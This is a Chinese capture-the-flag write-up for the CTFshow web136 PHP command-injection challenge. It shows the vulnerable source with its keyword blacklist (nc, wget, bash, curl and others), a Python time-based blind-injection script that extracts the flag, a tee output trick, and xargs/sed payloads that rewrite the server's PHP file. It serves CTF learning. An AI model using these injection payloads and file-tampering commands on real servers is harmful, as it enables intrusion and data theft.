目錄

• 源碼
• 思路
• 題解
• • 解法1
  • 解法2
  • 解法3
• 總結(jié)

---

源碼

<?php error_reporting(0); function check($x){if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){die('too young too simple sometimes naive!');} } if(isset($_GET['c'])){$c=$_GET['c'];check($c);exec($c); } else{highlight_file(__FILE__); } ?>

---

思路

剛開始發(fā)現(xiàn) ‘’ 和 “” 沒被過濾，可以繞過關(guān)鍵詞，當(dāng)時無回顯的話，可以用bash盲注

payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) payload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)

，還有curl帶出，我用的是 echo xxx | bas''e64 -d | ba''sh,但是命令執(zhí)行不了，求大佬解答

還有 tee 也可以創(chuàng)建文件

題解

解法1

改了下Y1ng師傅的腳本

#!/usr/bin/env python3 #-*- coding:utf-8 -*- #__author__: 穎奇L'Amore www.gem-love.comimport requests import time as t from urllib.parse import quote as urlen url = 'http://85abd7bc-8396-47d1-81d7-a10e92331e33.challenge.ctf.show/?c=' alphabet = ['{','}', '.','/','@','-','_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']result = '' for i in range(1,100):for char in alphabet:# payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) #flag.phppayload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)# data = {'cmd':payload}try:start = int(t.time())r = requests.get(url+payload)# r = requests.post(url, data=data)end = int(t.time()) - start# print(i,char)if end >= 3: result += charprint("Flag: "+result)breakexcept Exception as e:print(e)

中間的 . 應(yīng)該是盲注的時候有一個數(shù)據(jù)包響應(yīng)過長導(dǎo)致的
flag格式 ： ctfshow{8-4-4-4-12}

解法2

用 tee 把 ls / 的輸出，輸出進文件里

?c=ls | tee 1

?c=cat /f149_15_h3r3 | tee 2

解法3

但是看到群主的解法的時候，被震驚到了，居然還能這么玩，可以直接改源碼，tql

sed -i ‘s/book/books/g’ file 把book替換成 books

xargs 可以將管道或標(biāo)準(zhǔn)輸入（stdin）數(shù)據(jù)轉(zhuǎn)換成命令行參數(shù)，也能夠從文件的輸出中讀取數(shù)據(jù)。

find . -name ‘*.xml’ |xargs sed -i ‘s/hello/world/g’

參考資料： https://blog.csdn.net/weixin_39731083/article/details/82495950

自己測試了下（多動手.jpg）

也可以用xargs sed批量修改文件

ls | xargs sed -i "s/die/echo/"
把die 替換成 echo
ls | xargs sed -i "s/exec/system/"
把exec 替換成 system

然后就隨便玩了

?c=tac /f*

---

總結(jié)

Y1ng師傅 yyds

總結(jié)

以上是生活随笔為你收集整理的CTFshow php特性 web136的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。